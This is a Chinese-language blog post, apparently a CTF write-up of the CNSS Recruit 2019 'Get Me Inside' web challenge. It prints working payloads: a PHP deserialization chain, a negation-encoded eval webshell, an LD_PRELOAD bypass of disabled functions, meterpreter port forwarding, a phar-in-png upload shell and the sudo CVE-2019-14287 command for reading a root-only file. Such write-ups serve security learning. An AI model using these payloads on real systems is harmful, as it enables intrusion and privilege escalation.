<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="X5tar">



    <meta name="description" content="X5tar's Blog">


    <meta name="keywords" content="blog,ctf,personal">


<title>CNSS Recruit 2019 Web Boss题 WriteUp | X5tar&#39;s Blog</title>


    <link rel="icon" href="/favicon.ico">



    
    <link rel="stylesheet" href="/css/style.css">
    



    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-160185073-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-160185073-2');
</script>


<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="X5tar's Blog" type="application/atom+xml">
</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">X5tar&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">X5tar&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">CNSS Recruit 2019 Web Boss题 WriteUp</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">X5tar</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">October 24, 2019</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/CTF/">CTF</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="0x00-吐槽思考-for-BOSS-Get-Me-Inside"><a href="#0x00-吐槽思考-for-BOSS-Get-Me-Inside" class="headerlink" title="0x00 吐槽思考 for [BOSS] Get Me Inside"></a>0x00 <del>吐槽</del>思考 for [BOSS] Get Me Inside</h2><p>这道题肝的是真的爽，从 ddl 前一天晚上开始，搞到 ddl 当天凌晨四点多<del>（原来我的肝这么好）</del><br>这是一道涉及面广泛的题，考虑到了实战的一些情况，考察多方面的知识，是一道不可多得的好题（即使如此，我依旧想暴打各位出题人emmm）</p>
<h2 id="0x01-反序列化漏洞"><a href="#0x01-反序列化漏洞" class="headerlink" title="0x01 反序列化漏洞"></a>0x01 反序列化漏洞</h2><p>打开这道题首先就是一堆 PHP 源码，直接就摆上了一大堆 <code>class</code> ，先暂时略过这些 <code>class</code> ，继续向下看，我们会发现在源码的末尾有这么一段</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = $_GET[<span class="string">'p'</span>];</span><br><span class="line">unserialize($a);</span><br><span class="line"><span class="keyword">if</span>($flag === <span class="number">1</span>)&#123;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>结合上边的一大堆 <code>class</code> ，考虑利用反序列化漏洞，层层递进，最终将变量 <code>flag</code> 的值设为 <code>1</code> 即可，故构造以下 payload （这里可以直接复制粘贴，然后自己写一个脚本把需要的变量序列化一下即可）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;?p&#x3D;O:4:&quot;Deep&quot;:2:&#123;s:2:&quot;m1&quot;;O:4:&quot;Dark&quot;:2:&#123;s:2:&quot;m1&quot;;O:7:&quot;Fantasy&quot;:2:&#123;s:2:&quot;m1&quot;;O:5:&quot;Happy&quot;:2:&#123;s:2:&quot;m1&quot;;O:8:&quot;New_year&quot;:2:&#123;s:2:&quot;s1&quot;;O:21:&quot;Copied_from_somewhere&quot;:0:&#123;&#125;s:2:&quot;s2&quot;;N;&#125;s:2:&quot;m2&quot;;N;&#125;s:2:&quot;m2&quot;;N;&#125;s:2:&quot;m2&quot;;N;&#125;s:2:&quot;m2&quot;;N;&#125;</span><br></pre></td></tr></table></figure>
<p>输入后发现在未提供参数 <code>c</code> 的情况下输出了 <code>?</code> ，可知成功将 <code>flag</code> 设为 <code>1</code> </p>
<h2 id="0x02-get-shell"><a href="#0x02-get-shell" class="headerlink" title="0x02 get shell"></a>0x02 get shell</h2><p>之后查看最后的一段源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"?"</span>);</span><br><span class="line">&#125;</span><br><span class="line">$code = $_GET[<span class="string">'c'</span>];</span><br><span class="line"> <span class="keyword">if</span>(strlen($code)&gt;<span class="number">37</span>)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"这么长会死的!"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">"/[A-Za-z0-9^!]+/"</span>,$code))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"Catch you!"</span>);</span><br><span class="line">&#125;</span><br><span class="line">@<span class="keyword">eval</span>($code);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>考虑通过 <code>eval</code> 这个函数调用其他函数拿到系统 shell ，然而首先要面对的问题就是这个可恶的正则，你注入的代码中不能包含任何字母、数字和 <code>^</code> <code>!</code> 两种符号<br>这里可以使用 PHP 的另一种函数调用方式 <code>(函数名)(参数)</code> ，然后函数名和参数都采用按位取反的方式，通过url编码和 <code>~</code> 运算符调用函数<br>然后我们非常高兴的执行了 <code>system(&#39;whoami&#39;)</code> ，但是，什么都没有发生，看一下 <code>phpinfo()</code> ，发现几乎所有能拿到系统shell的函数都在 <code>disable_functions</code> 里，然后考虑绕过 <code>disable_functions</code> 的方法，经过多方查找，最后选择了通过 <code>LD_PRELOAD</code> 的方式绕过，但这种方法需要上传文件，所以继续构造 payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;?p&#x3D;O:4:%22Deep%22:2:&#123;s:2:%22m1%22;O:4:%22Dark%22:2:&#123;s:2:%22m1%22;O:7:%22Fantasy%22:2:&#123;s:2:%22m1%22;O:5:%22Happy%22:2:&#123;s:2:%22m1%22;O:8:%22New_year%22:2:&#123;s:2:%22s1%22;O:21:%22Copied_from_somewhere%22:0:&#123;&#125;s:2:%22s2%22;N;&#125;s:2:%22m2%22;N;&#125;s:2:%22m2%22;N;&#125;s:2:%22m2%22;N;&#125;s:2:%22m2%22;N;&#125;&amp;c&#x3D;(~%9e%8c%8c%9a%8d%8b)($&#123;~%a0%b8%ba%ab&#125;[%aa]);&amp;%aa&#x3D;eval($_POST[&#39;aaa&#39;]);</span><br></pre></td></tr></table></figure>
<p>这里我们采用另一个可以执行 PHP 语句的函数 <code>assert</code> ，但由于 <code>assert</code> 一次只能执行一条语句，我们可以在其中再加入一个 <code>eval</code> ，这里便出现了我们熟悉的一句话木马，二话不说扔到蚁剑里，发现 shell 依然无法使用，但可以读取和上传文件（这里是因为读取和上传文件可以用 PHP 自带的其它函数实现，所以不需要拿到 shell 就可以），由于 hint 告诉我们对 <code>html</code> 目录没有写权限，故考虑另一个目录 <code>/tmp</code> ，测试后发现有写权限，故可以上传构造的 <code>so</code> 文件进行进一步操作（但当时服务器里有不知哪位好心的大哥留下的 <code>so</code> 文件，我就直接拿来用了，后来知道那个文件<a href="https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD" target="_blank" rel="noopener">出自此处</a>，这个构造的十分巧妙，使用了另一个环境变量，配合 PHP 实现一次编译即可执行任意命令，无需每次修改命令都要重新编译，学到了)，然后 <code>include</code> 一下配套的 PHP 文件，按照 PHP 里的参数配置一下，成功拿到系统shell</p>
<h2 id="0x03-内网穿透"><a href="#0x03-内网穿透" class="headerlink" title="0x03 内网穿透"></a>0x03 内网穿透</h2><p>由于 hint 给出了 <code>LAN &amp; ARP</code> ，这里考虑 flag 可能存在于另一台服务器（记为服务器2）上，用 <code>arp -a</code> 看一下，发现有这么一个 IP 与众不同</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getmeinside_inner_1.getmeinside_lan (172.16.233.233) at 02:42:ac:10:e9:e9 [ether] on eth0</span><br></pre></td></tr></table></figure>
<p><code>curl</code> 看一下，发现有一个网页可以上传文件，考虑将服务器2的80端口转发出来，可以采用 msf 的 <code>meterpreter</code> 模块（这里需要自己有一个公网 IP ，我选择开了一个 VPS ，一般来说再将 VPS 端口转发到本地比较安全，但我为了方便直接在 VPS 上装了个 msf ，毕竟用完即删）<br>先用 <code>msfvenom</code> 做个木马，然后用蚁剑上传到服务器1，给一下执行权限，接下来在 <code>msfconsole</code> 中监听木马设置的端口，然后再服务器1中运行木马，拿到 <code>meterpreter shell</code>，然后用 <code>portfwd</code> 进行端口转发，打开转发到服务器上的端口，成功打开服务器2上的网页</p>
<h2 id="0x04-get-shell-Again"><a href="#0x04-get-shell-Again" class="headerlink" title="0x04 get shell Again"></a>0x04 get shell <strong>Again</strong></h2><p>打开页面，发现似乎可以上传什么东西，观察 url 有 <code>/?file=index</code> ，点击上传后 url 变化但页面并未变化，尝试去掉最后的 <code>.php</code> ，发现成功打开上传页面，可以判断 <code>file</code> 是一个 <code>include</code> 漏洞，尝试 <code>php伪协议</code> 读取源码，构造以下 payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;upload</span><br></pre></td></tr></table></figure>
<p>成功读到 <code>upload.php</code> 的源码（我第一次做的时候的确读到了源码，但再次尝试却发现读不到了QAQ）<br>观察上传页面，发现并无表单可以提交，就在本地写一个表单提交到服务器2，尝试发现只能上传 png 文件，由于 hint 指出了 <code>Phar</code> ，于是写一个一句话木马，打包成 <code>zip</code>（注意打包时选择不压缩），然后将拓展名改为 <code>png</code> ，成功上传，得到上传后的文件名，构造以下 payload（注意最后的木马名不需要 <code>.php</code>)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;?file&#x3D;phar:&#x2F;&#x2F;pic&#x2F;文件名&#x2F;木马名</span><br></pre></td></tr></table></figure>
<p>看一下 <code>phpinfo</code> ，发现拿 shell 的函数并没有被禁用，直接拿到系统shell（这里我想再扔到蚁剑里，但莫名其妙连不上，就手动操作了）</p>
<h2 id="0x05-读取-flag-文件"><a href="#0x05-读取-flag-文件" class="headerlink" title="0x05 读取 flag 文件"></a>0x05 读取 flag 文件</h2><p>根据 hint ，只有 root 用户可以读取 flag 文件，尝试 <code>sudo cat</code>，发现并不能读取，<code>sudo -l</code> 看一下权限，发现权限设置如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(ALL,!root) NOPASSWD:&#x2F;bin&#x2F;cat</span><br></pre></td></tr></table></figure>
<p>直接使用 <code>sudo</code> 无法使用 <code>cat</code> ，这里我探索了接近两小时终于搜到了一个神奇的漏洞 <code>CVE-2019-14287</code> ，漏洞具体信息可以参考我好不容易搜到的的<a href="https://www.agesec.com/8369.html" target="_blank" rel="noopener">这个网站</a><br>根据这个漏洞执行以下命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -u<span class="comment">#-1 /bin/cat /flag</span></span><br></pre></td></tr></table></figure>
<p>成功获得 flag！！！（泪目）</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>X5tar</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://x5tar.com/2019/10/24/cnss-recruit-2019-web-boss/">https://x5tar.com/2019/10/24/cnss-recruit-2019-web-boss/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC-BY-NC-SA-4.0</a> LICENSE</span>
                    </p>
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/CNSS/"># CNSS</a>
                    
                        <a href="/tags/WriteUp/"># WriteUp</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2019/11/26/flask-debug-pin/">关于 Flask Debug PIN 的安全性问题</a>
            
            
            <a class="next" rel="next" href="/2019/10/24/cnss-recruit-2019-web/">CNSS Recruit 2019 Web WriteUp</a>
            
        </section>

        
            <section id="comments" class="comments">
              <style>
                .comments{margin:30px;padding:10px;background:transparent}
                @media screen and (max-width:800px){.comments{margin:auto;padding:10px;background:transparent}}
              </style>
              <div id="vcomments"></div>
<!-- <div class="valine_comment"></div> -->
<!--载入js，在</body>之前插入即可-->
<!--Leancloud 操作库:-->
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<!--Valine 的核心代码库-->
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script src="https://cdn.bootcss.com/jquery/1.10.2/jquery.min.js"></script>
<script>
  new Valine({
      el: '#vcomments',
      app_id: 'iAbQo5y0XlBlUP9F0K3Tyx8f-MdYXbMMI',
      app_key: 'ML5YMAAFe45gCJawVJcUkrg0',
      placeholder: '请在这里留言',
      notify: 'true',
      verify: 'true',
    });

$(document).ready(function(){ 
    if($("#vcomments").html()){
        var c_name = $('#vcomments input[name="nick"]');
        var c_mail = $('#vcomments input[type="email"]');
        var c_text = $('#veditor');
        var mailzz = /^([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+@([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+\.[a-zA-Z]{2,3}$/;
        var c_placeholder = c_text.attr('placeholder');
        $(".vcontrol .text-right button").hide();
        $(".vcontrol .text-right").prepend('<span class="submit_f vbtn">回复</span>');
        $('body').on('click','.submit_f',function(){
            if(nullpd(c_name.val())){ 
                alert("昵称不能为空");
                return false;
            }
            if(nullpd(c_mail.val())){ 
                alert("邮箱不能为空");
                return false;
            }
            if(!mailzz.test(c_mail.val())){
                alert("邮箱无效");
                return false;
            }
            if(!c_text.val()){
                alert("留言评论不能为空");
                return false;
            }
            $('.vsubmit').click();
        });
        function nullpd(str){
            if(str == "" || str == null || str == undefined){
                return true;
            }else{
                return false;
            }
        }
     }
    }); 
</script>
            </section>
        

    </article>
</div>


        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© X5tar | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
